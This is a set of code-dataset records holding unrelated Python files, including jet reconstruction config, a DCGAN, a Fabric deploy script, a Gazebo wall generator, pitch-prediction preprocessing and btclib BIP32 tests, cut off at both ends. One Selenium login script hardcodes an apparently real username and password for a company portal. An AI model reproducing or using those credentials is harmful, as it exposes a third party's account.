ThinNegativeEnergyCaloClusters = True,\n CaloClustersKey = 'LCOriginTopoClusters',\n StreamName = 'StreamAOD'))\n if not IsInInputFile(\"xAOD::CaloClusterContainer\",\"EMOriginTopoClusters\"):\n ctools += [jtm.JetConstitSeq_EMOrigin]\n if thinneg:\n from ThinningUtils.ThinningUtilsConf import ThinNegativeEnergyCaloClustersAlg\n postalgs.append (ThinNegativeEnergyCaloClustersAlg ('ThinNegEMOriginTopoClusters',\n ThinNegativeEnergyCaloClusters = True,\n CaloClustersKey = 'EMOriginTopoClusters',\n StreamName = 'StreamAOD'))\n if not IsInInputFile(\"xAOD::PFOContainer\",\"CHSParticleFlowObjects\"):\n if not hasattr(job,\"jetalgCHSPFlow\"):\n ctools += [jtm.JetConstitSeq_PFlowCHS]\n if thinneg:\n from ThinningUtils.ThinningUtilsConf import ThinNegativeEnergyNeutralPFOsAlg\n CHSnPFOsThinAlg = ThinNegativeEnergyNeutralPFOsAlg(\n \"ThinNegativeEnergyCHSNeutralPFOsAlg\",\n NeutralPFOsKey=\"CHSNeutralParticleFlowObjects\",\n ThinNegativeEnergyNeutralPFOs = True,\n StreamName = 'StreamAOD'\n )\n postalgs.append(CHSnPFOsThinAlg)\n\n from JetRec.JetRecConf import JetToolRunner\n from JetRec.JetRecConf import JetAlgorithm\n runners = []\n if len(ctools)>0:\n jtm += JetToolRunner(\"jetconstit\",\n EventShapeTools=[],\n Tools=ctools,\n Timer=jetFlags.timeJetToolRunner()\n )\n job += JetAlgorithm(\"jetalgConstituents\",\n Tools=[jtm.jetconstit])\n\n # Add all the PseudoJetAlgorithms now\n # To avoid massive refactoring and to preserve familiarity,\n # kept calling things \"getters\", but these are already\n # PseudoJetAlgorithms as we eliminated the wrappers\n for getter in jtm.allGetters:\n job += getter\n\n # Then, add all event shape tools in separate algs\n for evstool in jtm.allEDTools:\n from EventShapeTools.EventShapeToolsConf import EventDensityAthAlg\n job += EventDensityAthAlg(\"edalg_\"+evstool.OutputContainer,EventDensityTool=evstool)\n\n if separateJetAlgs:\n\n for t in jtm.jetrecs:\n jalg = JetAlgorithm(\"jetalg\"+t.name(),\n Tools = [t])\n job += jalg\n\n else:\n from JetRec.JetRecConf import JetToolRunner\n jtm += 
JetToolRunner(\"jetrun\",\n EventShapeTools=[],\n Tools=rtools+jtm.jetrecs,\n Timer=jetFlags.timeJetToolRunner()\n )\n runners += [jtm.jetrun]\n\n job += JetAlgorithm(\"jetalg\")\n jetalg = job.jetalg\n jetalg.Tools = runners\n if jetFlags.debug > 0:\n # jtm.setOutputLevel(jtm.jetrun, DEBUG)\n jetalg.OutputLevel = DEBUG\n if jetFlags.debug > 1:\n for tool in jtm.jetrecs:\n jtm.setOutputLevel(tool, DEBUG)\n if jetFlags.debug > 2:\n for tool in jtm.finders:\n jtm.setOutputLevel(tool, DEBUG)\n if jetFlags.debug > 3:\n jtm.setOutputLevel(jtm.jetBuilderWithArea, DEBUG)\n jtm.setOutputLevel(jtm.jetBuilderWithoutArea, DEBUG)\n\n for postalg in postalgs:\n job += postalg\n \n","sub_path":"Reconstruction/Jet/JetRec/python/JetAlgorithm.py","file_name":"JetAlgorithm.py","file_ext":"py","file_size_in_byte":8050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"598579181","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom keras.datasets import mnist\nfrom keras.layers import (Activation, BatchNormalization, Dense, Dropout, Flatten, Reshape)\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.convolutional import Conv2D, Conv2DTranspose\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\n\nclass Dataset:\n def __init__(self):\n self.num_labeled = 100\n\n (self.x_train, self.y_train), (self.x_test, self.y_test) = mnist.load_data()\n\n def training_set(self):\n x_train = self.x_train[range(self.num_labeled)]\n y_train = self.y_train[range(self.num_labeled)]\n return x_train, y_train\n\n\n def test_set(self):\n return self.x_test, self.y_test\n\nclass DCGAN:\n def __init__(self):\n self.img_rows = 28\n self.img_cols = 28\n self.channels = 1\n self.img_shape = (self.img_rows, self.img_cols, self.channels)\n self.z_dim = 100\n \n\n \n\n def build_generator(self):\n\n model = Sequential()\n\n model.add(Dense(256 * 7 * 7, input_dim=self.z_dim))\n model.add(Reshape((7, 7, 256)))\n model.add(Conv2DTranspose(128, kernel_size=3, strides=2, padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.01))\n model.add(Conv2DTranspose(64, kernel_size=3, strides=1, padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.01))\n model.add(Conv2DTranspose(1, kernel_size=3, strides=2, padding='same'))\n model.add(Activation('tanh'))\n return model\n\n def build_discriminator(self):\n model = Sequential()\n model.add(Conv2D(32,kernel_size=3, strides=2,input_shape=self.img_shape,padding='same'))\n model.add(LeakyReLU(alpha=0.01))\n model.add(Conv2D(64,kernel_size=3,strides=2, input_shape=self.img_shape,padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.01))\n model.add(Conv2D(128,kernel_size=3,strides=2,input_shape=self.img_shape,padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.01))\n model.add(Flatten())\n model.add(Dropout(0.5))\n model.add(Dense(1, activation='sigmoid'))\n return model\n\n def build_gan(self,generator,discriminator):\n model = Sequential()\n model.add(generator)\n model.add(discriminator)\n return model\n\n\n def train(self,iterations, batch_size, sample_interval):\n train_hist={}\n train_hist['D_losses']=[]\n train_hist['G_losses']=[]\n def save_model(step):\n f1= 'models/dcgan_discriminator_weight_%04d.h5' % (step+1)\n f2= 'models/dcgan_generator_weight_%04d.h5' % (step+1)\n discriminator.save(f1)\n generator.save(f2)\n #print(\"save model\")\n\n losses = []\n accuracies = []\n 
iteration_checkpoints = []\n d_losses_real=[]\n d_losses_fake=[]\n \n (X_train, _), (_,_) = mnist.load_data()\n\n def sample_images(epoch,image_grid_rows=4, image_grid_columns=4):\n\n z = np.random.normal(0, 1, (image_grid_rows * image_grid_columns, self.z_dim))\n gen_imgs = generator.predict(z)\n gen_imgs = 0.5 * gen_imgs + 0.5\n fig, axs = plt.subplots(image_grid_rows,\n image_grid_columns,\n figsize=(10, 4),\n sharey=True,\n sharex=True)\n\n cnt = 0\n for i in range(image_grid_rows):\n for j in range(image_grid_columns):\n axs[i, j].imshow(gen_imgs[cnt, :, :, 0], cmap='gray')\n axs[i, j].axis('off')\n cnt += 1\n plt.tight_layout()\n plt.show()\n #fig.savefig(\"images/generator/%d.png\" % epoch)\n\n \n discriminator = self.build_discriminator()\n discriminator.compile(loss='binary_crossentropy',optimizer=Adam(),metrics=['accuracy'])\n\n generator = self.build_generator()\n discriminator.trainable = False\n\n gan = self.build_gan(generator, discriminator)\n gan.compile(loss='binary_crossentropy', optimizer=Adam())\n \n\n X_train = X_train / 127.5 - 1.0\n X_train = np.expand_dims(X_train, axis=3)\n\n real = np.ones((batch_size, 1))\n\n fake = np.zeros((batch_size, 1))\n\n for iteration in range(iterations):\n idx = np.random.randint(0, X_train.shape[0], batch_size)\n imgs = X_train[idx]\n\n z = np.random.normal(0, 1, (batch_size, 100))\n gen_imgs = generator.predict(z)\n\n d_loss_real = discriminator.train_on_batch(imgs, real)\n d_loss_fake = discriminator.train_on_batch(gen_imgs, fake)\n d_loss, accuracy = 0.5 * np.add(d_loss_real, d_loss_fake)\n\n\n\n g_loss = gan.train_on_batch(z, real)\n\n if (iteration + 1) % sample_interval == 0:\n train_hist['D_losses'].append(d_loss)\n train_hist['G_losses'].append(g_loss)\n\n #losses.append((d_loss, g_loss))\n d_losses_real.append(d_loss_real)\n d_losses_fake.append(d_loss_fake)\n accuracies.append(100.0 * accuracy)\n iteration_checkpoints.append(iteration + 1)\n\n print(\"%d [D loss: %f] [G loss: %f]\" % (iteration + 1, d_loss, g_loss))\n\n sample_images(iteration)\n save_model(iteration)\n return train_hist, accuracies, iteration_checkpoints, d_losses_real,d_losses_fake","sub_path":"DCGAN/dcgan.py","file_name":"dcgan.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"312873375","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nUsage:\n fab deploy:appname\n\"\"\"\nfrom fabric.api import env, run, cd, local, put\n\nenv.hosts = ['myserver.com']\nenv.user = 'eric'\nDEPLOY_PATH = '/var/www/'\nAPP_NAME = None\nAPP_PATH = None\nDATABASE_CONF_PATH = '/srv/conf/database.yml'\n\ndef pack_code():\n local('svn export --force svn://192.168.1.5/projects/%s /tmp/%s'%(APP_NAME,APP_NAME))\n with cd('/tmp/%s'%APP_NAME):\n local('tar czf /tmp/%s.tgz .'%APP_NAME)\n\ndef upload_code():\n put('/tmp/%s.tgz'%APP_NAME, '/tmp/')\n with cd(APP_PATH):\n run('tar xzf /tmp/%s.tgz'%APP_NAME)\n\ndef conf():\n run(\"cp %s %s/config/\"%(DATABASE_CONF_PATH, APP_PATH))\n run(\"ln -nfs /srv/photos %s/public/photos\"%APP_PATH)\n with cd(APP_PATH):\n run(\"rake db:migrate RAILS_ENV=production\")\n\ndef restart(name='back-end'):\n run(\"touch %s%s/tmp/restart.txt\"%(DEPLOY_PATH, name))\n\ndef deploy(name='back-end'):\n global APP_NAME, APP_PATH\n APP_NAME = name\n APP_PATH = '%s%s'%(DEPLOY_PATH, APP_NAME)\n pack_code()\n upload_code()\n conf()\n 
restart(APP_NAME)","sub_path":"dockerized-gists/472566/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"37779496","text":"# import the selenium library's webdriver to control the browser\r\nfrom selenium import webdriver\r\n\r\n# define the browser variable and launch the application to open the page\r\n#browser = webdriver.Ie()\r\nbrowser2 = webdriver.Chrome()\r\n#type(browser)\r\ntype(browser2)\r\n\r\n# here we set which URL the bot opens in the browser we defined above.\r\n#browser.get('http://gc.gssbr.com.br:7777')\r\nbrowser2.get('http://osonline.aegea.com.br:5555/sansysos/efetuarLoginUsuario.wf?flSessaoExpirada=S')\r\n\r\n# below we perform the login on the URL we opened in browser2.\r\nloginelmen = browser2.find_element_by_name('nmLogin')\r\nloginelmen.send_keys('tanzilheiro.camboriu')\r\nloginelmen2 = browser2.find_element_by_name('nmSenha')\r\nloginelmen2.send_keys('Theo@2018')\r\n\r\n# here we tell the bot to click ENTER on the page we logged into above\r\nentrar = browser2.find_element_by_name('_eventId_btLogar')\r\nentrar.submit()\r\n\r\nbrowser2.set_page_load_timeout(30)\r\noperacional = browser2.find_element_by_id('ext-240')","sub_path":"roboto.py","file_name":"roboto.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"19002057","text":"\"\"\"\nCreated on 7/7/16\nAuthor = jchan\n\"\"\"\n__author__ = 'jchan'\n\nimport numpy as np\nfrom pykalman import KalmanFilter\n\nfrom algotrader.technical import Indicator\n\n\nclass KalmanFilteringPairRegression(Indicator):\n    SLOPE = 'slope'\n    INTERCEPT = 'intercept'\n\n    __slots__ = (\n        'length',\n    )\n\n    @staticmethod\n    def get_name(input, length):\n        return \"KalmanFilteringPairRegression(%s,%s)\" % (Indicator.get_input_name(input), length)\n\n    def __init__(self, input=None, length=10, description=\"Kalman Filter Regression\"):\n        super(KalmanFilteringPairRegression, self) \\\n            .__init__(KalmanFilteringPairRegression.get_name(input, length),\n                      input=input,\n                      keys=['slope', 'intercept'],\n                      default_key='slope',\n                      description=description)\n        self.length = int(length)\n        delta = 1e-5\n        self.trans_cov = delta / (1 - delta) * np.eye(2)\n        super(KalmanFilteringPairRegression, self).update_all()\n\n    def on_update(self, data):\n        result = {}\n        result['timestamp'] = data['timestamp']\n        if self.input.size() >= self.length:\n\n            independent_var = self.input.get_by_idx_range(key=None, start_idx=0, end_idx=-1)\n            symbol_set = set(self.input.keys)\n            depend_symbol = symbol_set.difference(self.input.default_key)\n            depend_var = self.input.get_by_idx_range(key=depend_symbol, start_idx=0, end_idx=-1)\n\n            obs_mat = np.vstack([independent_var.values, np.ones(independent_var.values.shape)]).T[:, np.newaxis]\n            model = KalmanFilter(n_dim_obs=1, n_dim_state=2,\n                                 initial_state_mean=np.zeros(2),\n                                 initial_state_covariance=np.ones((2, 2)),\n                                 transition_matrices=np.eye(2),\n                                 observation_matrices=obs_mat,\n                                 observation_covariance=1.0,\n                                 transition_covariance=self.trans_cov)\n\n            state_means, state_covs = model.filter(depend_var.values)\n            slope = state_means[:, 0][-1]\n            result[Indicator.VALUE] = slope\n            result[KalmanFilteringPairRegression.SLOPE] = slope\n            result[KalmanFilteringPairRegression.INTERCEPT] = state_means[:, 1][-1]\n            self.add(result)\n\n        else:\n            result[Indicator.VALUE] = np.nan\n            result[KalmanFilteringPairRegression.SLOPE] = np.nan\n            result[KalmanFilteringPairRegression.INTERCEPT] = np.nan\n            self.add(result)\n","sub_path":"algotrader/technical/kfpairregression.py","file_name":"kfpairregression.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"438368611","text":"from .client_call import ClientCall\n\n\nclass ChooseRole(ClientCall):\n    def __init__(self, first: str, second: str):\n        super().__init__()\n        self.first_role: str = first or \"FILL\"\n        self.second_role: str = second or \"FILL\"\n\n    async def build(self):\n        self.method = \"PUT\"\n        self.endpoint = \"/lol-lobby/v2/lobby/members/localMember/position-preferences\"\n        self.payload = {\n            \"firstPreference\": self.first_role,\n            \"secondPreference\": self.second_role,\n        }\n\n    async def action(self, response: \"WebsocketEventResponse\"):\n        print(\"Selected role\")\n","sub_path":"leaguepybotv2.0/_backup2/leaguepybotv2.1/commands/choose_role.py","file_name":"choose_role.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"199431279","text":"import arcade\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSEEDS = 4\nPARASITES = 4\nPOS_IN_LINE = SCREEN_WIDTH / 5\n\n\ndef draw_rind():\n    arcade.draw_lrtb_rectangle_filled(0, SCREEN_WIDTH, SCREEN_HEIGHT/8, 0, arcade.color.GREEN)\n    arcade.draw_lrtb_rectangle_filled(SCREEN_WIDTH/5, SCREEN_WIDTH*2/5, SCREEN_HEIGHT/8, 0, arcade.color.DARK_GREEN)\n    arcade.draw_lrtb_rectangle_filled(SCREEN_WIDTH*3/5, SCREEN_WIDTH*4/5, SCREEN_HEIGHT/8, 0, arcade.color.DARK_GREEN)\n    arcade.draw_lrtb_rectangle_filled(0, SCREEN_WIDTH, SCREEN_HEIGHT/8+5, SCREEN_HEIGHT/8, arcade.color.WHITE)\n\n\ndef draw_seed(x, y):\n    arcade.draw_parabola_filled(x, y, x + 20, 15,\n                                arcade.color.BLACK_OLIVE, 180)\n    arcade.draw_triangle_filled(x, y + 15, x + 20, y + 15,\n                                x + 10, y + 35, arcade.color.BLACK_OLIVE)\n\n\ndef draw_pearl_string(x, y):\n    arcade.draw_circle_filled(x, y, 15, arcade.color.PEARL)\n    arcade.draw_circle_filled(x-25, y+15, 15, arcade.color.PEARL)\n    arcade.draw_circle_filled(x+25, y+15, 15, arcade.color.PEARL)\n    arcade.draw_circle_filled(x+50, y+30, 15, arcade.color.PEARL)\n    arcade.draw_circle_filled(x-50, y+30, 15, arcade.color.PEARL)\n\n\ndef add_seeds():\n    seed_pos = POS_IN_LINE\n    for i in range(SEEDS):\n        draw_seed(seed_pos, 100)\n        seed_pos += SCREEN_WIDTH/5\n\n\ndef draw_parasite(x, y):\n    arcade.draw_parabola_outline(x,\n                                 y, x + 20, 20, arcade.color.FOREST_GREEN, 6, 0)\n    arcade.draw_parabola_outline(x + 20,\n                                 y, x + 50, 20, arcade.color.FOREST_GREEN, 6, 180)\n    arcade.draw_parabola_outline(x + 90,\n                                 y, x + 120, 20, arcade.color.FOREST_GREEN, 6, 0)\n    arcade.draw_parabola_outline(x + 120,\n                                 y, x + 140, 20, arcade.color.FOREST_GREEN, 6, 180)\n    arcade.draw_circle_filled(x + 70,\n                              y, 30, arcade.color.FOREST_GREEN)\n    arcade.draw_parabola_outline(x,\n                                 y - 20, x + 20, 20, arcade.color.FOREST_GREEN, 6, 0)\n    arcade.draw_parabola_outline(x + 20,\n                                 y - 20, x + 40, 20, arcade.color.FOREST_GREEN, 6,\n                                 180)\n    arcade.draw_parabola_outline(x + 100,\n                                 y - 20, x + 120, 20, arcade.color.FOREST_GREEN, 6,\n                                 0)\n    arcade.draw_parabola_outline(x + 120,\n                                 y - 20, x + 140, 20, arcade.color.FOREST_GREEN, 6,\n                                 180)\n    arcade.draw_circle_filled(x + 70,\n                              y, 10, arcade.color.BLACK)\n\n\ndef add_parasites():\n    parasite_pos = POS_IN_LINE\n    for i in range(PARASITES):\n        draw_parasite(parasite_pos, 300)\n        parasite_pos += SCREEN_WIDTH / 5\n\n\ndef 
main():\n arcade.open_window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Robbie's Watermelon Land\")\n arcade.set_background_color(arcade.color.PERSIAN_RED)\n arcade.start_render()\n\n draw_rind()\n add_seeds()\n add_parasites()\n draw_pearl_string(400, 500)\n\n arcade.finish_render()\n arcade.run()\n\n\nmain()\n","sub_path":"Lab 03 - Draw Using Functions/lab_03.py","file_name":"lab_03.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"433954100","text":"from pathlib import Path\n\n\ndef parse_data():\n with open(Path(__file__).stem + \".txt\") as fp:\n data = fp.readlines()\n for line in data:\n left, right = line.split(\",\")\n left = left.split(\"-\")\n right = right.split(\"-\")\n yield ((int(left[0]), int(left[1])), (int(right[0]), int(right[1])))\n\n\ndef check_full_overlap(left, right):\n if left[0] <= right[0] and left[1] >= right[1]:\n return True\n left, right = right, left\n if left[0] <= right[0] and left[1] >= right[1]:\n return True\n\n\ndef check_partial_overlap(left, right):\n overlaps = (\n (left[0], right[0], left[1]),\n (left[0], right[1], left[1]),\n (right[0], left[0], right[1]),\n (right[0], left[1], right[1]),\n )\n for l, m, r in overlaps:\n if l <= m <= r:\n return True\n\n\ndef main_a():\n count = 0\n for left, right in parse_data():\n if check_full_overlap(right, left):\n count += 1\n print(count)\n\n\ndef main_b():\n count = 0\n for left, right in parse_data():\n if check_partial_overlap(left, right):\n count += 1\n print(count)\n\n\nif __name__ == \"__main__\":\n # main_a()\n main_b()\n","sub_path":"2022/aoc04.py","file_name":"aoc04.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"399969162","text":"from xml.dom import minidom\nimport xml.etree.ElementTree as ET\n\ndAperture = .99\nyWallSize = 0.01\nzWallSize = 0.4\nenvMaxSize = 5.01\nsectioSize = 2.99\nnum_walls = 12\n\nenvMaterial = 'Wood'\nsdf = ET.Element('sdf',attrib={'version':'1.6'})\nmodel = ET.SubElement(sdf, 'model', attrib={'name':'circuit_left_right_turns'})\nET.SubElement(model, 'pose', attrib={'frame':''}).text = '0 0 0 0 -0 0'\n\nyWallHalfSize = yWallSize/2\nzWallHalfSize = zWallSize/2\ninEnvSize = envMaxSize - (2 * yWallSize)\n\nclass Wall:\n xWallSize = None\n xWallPose = None\n yWallPose = None\n yawWallPose = None\n\nwalls = [Wall() for _ in range(num_walls)]\n\nwalls[0].xWallSize = envMaxSize - yWallSize\nwalls[0].xWallPose = yWallHalfSize\nwalls[0].yWallPose = walls[0].xWallSize/2\nwalls[0].yawWallPose = 1.5708\n\nwalls[1].xWallSize = sectioSize + yWallSize\nwalls[1].xWallPose = walls[1].xWallSize/2\nwalls[1].yWallPose = walls[0].xWallSize + yWallHalfSize\nwalls[1].yawWallPose = 0\n\nwalls[2].xWallSize = inEnvSize - walls[1].xWallSize + yWallSize\nwalls[2].xWallPose = walls[0].xWallPose + walls[1].xWallSize\nwalls[2].yWallPose = walls[1].yWallPose - (walls[2].xWallSize/2) + yWallHalfSize\nwalls[2].yawWallPose = 1.5708\n\nwalls[3].xWallSize = walls[2].xWallSize\nwalls[3].xWallPose = walls[2].yWallPose - yWallSize\nwalls[3].yWallPose = walls[2].xWallPose \nwalls[3].yawWallPose = 0\n\nwalls[4].xWallSize = walls[1].xWallSize\nwalls[4].xWallPose = walls[1].yWallPose\nwalls[4].yWallPose = walls[1].xWallPose + yWallSize\nwalls[4].yawWallPose = 1.5708\n\nwalls[5].xWallSize = walls[0].xWallSize\nwalls[5].xWallPose = walls[0].yWallPose + yWallSize\nwalls[5].yWallPose = walls[0].xWallPose\nwalls[5].yawWallPose = 
0\n\nwalls[6].xWallSize = inEnvSize - (2*dAperture + yWallSize)\nwalls[6].xWallPose = yWallSize + dAperture + yWallHalfSize\nwalls[6].yWallPose = walls[0].yWallPose\nwalls[6].yawWallPose = 1.5708\n\nwalls[7].xWallSize = walls[1].xWallSize - (2*yWallSize) - (2*dAperture)\nwalls[7].xWallPose = walls[1].xWallPose\nwalls[7].yWallPose = walls[6].yWallPose + (walls[6].xWallSize/2) + yWallHalfSize\nwalls[7].yawWallPose = 0\n\nwalls[8].xWallSize = walls[2].xWallSize\nwalls[8].xWallPose = walls[6].xWallPose + walls[7].xWallSize\nwalls[8].yWallPose = walls[7].yWallPose - (walls[8].xWallSize/2) + yWallHalfSize\nwalls[8].yawWallPose = 1.5708\n\nwalls[9].xWallSize = walls[8].xWallSize\nwalls[9].xWallPose = walls[8].yWallPose - yWallSize\nwalls[9].yWallPose = walls[8].xWallPose \nwalls[9].yawWallPose = 0\n\nwalls[10].xWallSize = walls[7].xWallSize\nwalls[10].xWallPose = walls[7].yWallPose\nwalls[10].yWallPose = walls[4].yWallPose\nwalls[10].yawWallPose = 1.5708\n\nwalls[11].xWallSize = walls[6].xWallSize\nwalls[11].xWallPose = walls[5].xWallPose\nwalls[11].yWallPose = walls[6].xWallPose\nwalls[11].yawWallPose = 0\n\nfor i in range(num_walls):\n\n link = ET.SubElement(model, 'link', attrib={'name':'Wall_' + str(i)})\n\n collision = ET.SubElement(link, 'collision', attrib={'name':'Wall_' + str(i) + '_Collision'})\n\n ET.SubElement(ET.SubElement(ET.SubElement(collision, 'geometry'), 'box'), 'size').text = \\\n str(walls[i].xWallSize) + ' ' + str(yWallSize) + ' ' + str(zWallSize)\n\n ET.SubElement(collision, 'pose', attrib={'frame':''}).text = \\\n '0 0 ' + str(zWallHalfSize) + ' 0 -0 0'\n\n visual = ET.SubElement(link, 'visual', attrib={'name':'Wall_' + str(i) + '_Visual'})\n\n ET.SubElement(visual, 'pose', attrib={'frame':''}).text = \\\n '0 0 ' + str(zWallHalfSize) + ' 0 -0 0'\n\n ET.SubElement(ET.SubElement(ET.SubElement(visual, 'geometry'), 'box'), 'size').text = \\\n str(walls[i].xWallSize) + ' ' + str(yWallSize) + ' ' + str(zWallSize)\n\n material = ET.SubElement(visual, 'material')\n\n script = ET.SubElement(material, 'script')\n\n ET.SubElement(script, 'uri').text = 'file://media/materials/scripts/gazebo.material'\n ET.SubElement(script, 'name').text = 'Gazebo/' + envMaterial\n\n ET.SubElement(material, 'ambient').text = '1 1 1 1'\n\n ET.SubElement(link, 'pose', attrib={'frame':''}).text = \\\n str(walls[i].xWallPose) + ' ' + str(walls[i].yWallPose) + ' 0 0 -0 ' + str(walls[i].yawWallPose)\n\n\nET.SubElement(model, 'static').text = '1'\n\ntree = minidom.parseString(ET.tostring(sdf)).toprettyxml(indent=\" \")\nwith open('model.sdf', \"w\") as fh:\n fh.write(tree)","sub_path":"scripts/create_circuit_left_right_turns.py","file_name":"create_circuit_left_right_turns.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"230871158","text":"import pandas as pd\nimport h5py\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nimport argparse\n\n'''\nThis script loads and transforms the data in 3 csv files (atbats, pitches,\nand player_names), transforming it into sequences of vectors suitable\nfor the deep learning pitch type prediction. 
The final sequences and vectors\nfor each atbat are stored in an h5 file for easly loading and retrieval.\n'''\n\ndef load_transform_data(abs, pitches):\n #read in csv files\n print('reading in data.')\n atbats = pd.read_csv(abs)\n pitcher_id = 453286 # --> Max Scherzer!!!!\n atbats = atbats[atbats['pitcher_id']==pitcher_id]\n pitches = pd.read_csv(pitches)\n\n # change key data type\n print('transforming data.')\n pitches['ab_id'] = pitches['ab_id'].astype(int)\n\n # get columns of interest\n ab_cols = ['inning', 'p_score', 'p_throws', 'stand', 'top', 'ab_id']\n pitch_cols = ['pitch_type', 'b_score', 'b_count', 's_count', 'outs',\n 'on_1b', 'on_2b', 'on_3b', 'ab_id', 'type']\n\n # merge pitches and atbats into 1 df\n df = pitches.merge(atbats, left_on='ab_id', right_on='ab_id')\n\n # drop abs containing infrequent pitch types\n low_counts = ['AB', 'FA', 'UN', 'PO', 'FO', 'EP', 'KN', 'IN', 'SC', 'KC', 'FS', 'SI']\n dropabs = df[df['pitch_type'].isin(low_counts)]['ab_id'].unique().tolist()\n df = df[~df['ab_id'].isin(dropabs)]\n df = df.dropna()\n\n # convert pitch types to numerics\n pitch_class = {\n 'FF': 0,\n 'SL': 1,\n 'CH': 2,\n 'CU': 3,\n 'FC': 4,\n 'FT': 5\n }\n\n # transform columns to usable format and scale values\n df['score_diff'] = df['p_score'] - df['b_score']\n score_scaler = StandardScaler()\n df['score_diff'] = score_scaler.fit_transform(df['score_diff'].values.reshape(-1, 1))\n inning_scaler = MinMaxScaler()\n df['inning'] = inning_scaler.fit_transform(df['inning'].values.reshape(-1, 1))\n df['p_R'] = (df['p_throws'] == 'R') * 1.0\n df['p_L'] = (df['p_throws'] == 'L') * 1.0\n df['b_R'] = (df['stand'] == 'R') * 1.0\n df['b_L'] = (df['stand'] == 'L') * 1.0\n df['pitch_class'] = df['pitch_type'].apply(lambda x: pitch_class[x])\n df['FF'] = (df['pitch_type'] == 'FF') * 1.0\n df['SL'] = (df['pitch_type'] == 'SL') * 1.0\n df['CH'] = (df['pitch_type'] == 'CH') * 1.0\n df['CU'] = (df['pitch_type'] == 'CU') * 1.0\n df['FC'] = (df['pitch_type'] == 'FC') * 1.0\n df['FT'] = (df['pitch_type'] == 'FT') * 1.0\n\n return df\n\ndef convert(data_frame):\n # define columns for each vector\n init_cols = ['score_diff', 'inning', 'outs', 'p_R', 'p_L', 'b_R',\n 'b_L', 'on_1b', 'on_2b', 'on_3b']\n seq_cols = ['FF', 'SL', 'CH', 'CU', 'FC', 'FT', 'b_count', 's_count']\n label_cols = 'pitch_class'\n\n # get ab_ids to loop through\n abs = data_frame['ab_id'].unique()\n\n # create lists for init, seq, and labels\n init = []\n seq = []\n labels = []\n lens = []\n\n # define seq and label shape to be of length 21\n seq_shape = (21, 8)\n label_shape = (22,)\n\n # for each ab, create vectors and add to list\n print('creating vectors.')\n abs_len = len(abs)\n for i, ab in enumerate(abs):\n if i % (abs_len // 100) == 0:\n print('%.2f' % (i / abs_len * 100), '% done!')\n atbat = data_frame[data_frame['ab_id']==ab].reset_index()\n init_vec = atbat[init_cols].loc[0].to_numpy()\n seq_data = atbat[seq_cols].to_numpy()\n label_data = atbat[label_cols].to_numpy()\n\n seq_len = seq_data.shape[0]\n seq_vecs = np.zeros(seq_shape)\n seq_vecs[:seq_data.shape[0]-1,:8] = seq_data[:-1,:]\n seq_vecs = np.insert(seq_vecs, 0, 0, axis=0)\n\n label_vecs = np.full(label_shape, np.nan)\n label_vecs[:len(label_data)] = label_data\n\n init.append(init_vec)\n seq.append(seq_vecs)\n labels.append(label_vecs)\n lens.append(seq_len)\n print('vectors created.')\n\n return np.array(init), np.array(seq), np.array(labels), np.array(lens)\n\ndef store(inits, seqs, labels, lens):\n # create h5 files for writing\n print('writing h5 
{"seq_id":"7743759","text":"#!/usr/bin/env python3\n\n# Copyright (C) 2017-2019 The btclib developers\n#\n# This file is part of btclib. It is subject to the license terms in the\n# LICENSE file found in the top-level directory of this distribution.\n#\n# No part of btclib including this file, may be copied, modified, propagated,\n# or distributed except according to the terms contained in the LICENSE file.\n\nimport unittest\nimport os\nimport json\n\nfrom btclib import base58\nfrom btclib import bip32, bip39\n\nclass TestBIP32(unittest.TestCase):\n def test_vector1(self):\n \"\"\"BIP32 test vector 1\n https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki\n \"\"\"\n xkey_version = bip32.PRV_VERSION[0]\n\n seed = \"000102030405060708090a0b0c0d0e0f\"\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version)\n self.assertEqual(rootxprv,\n b\"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi\")\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version.hex())\n self.assertEqual(rootxprv,\n b\"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi\")\n rootxpub = bip32.xpub_from_xprv(rootxprv) # neutering\n self.assertEqual(rootxpub,\n 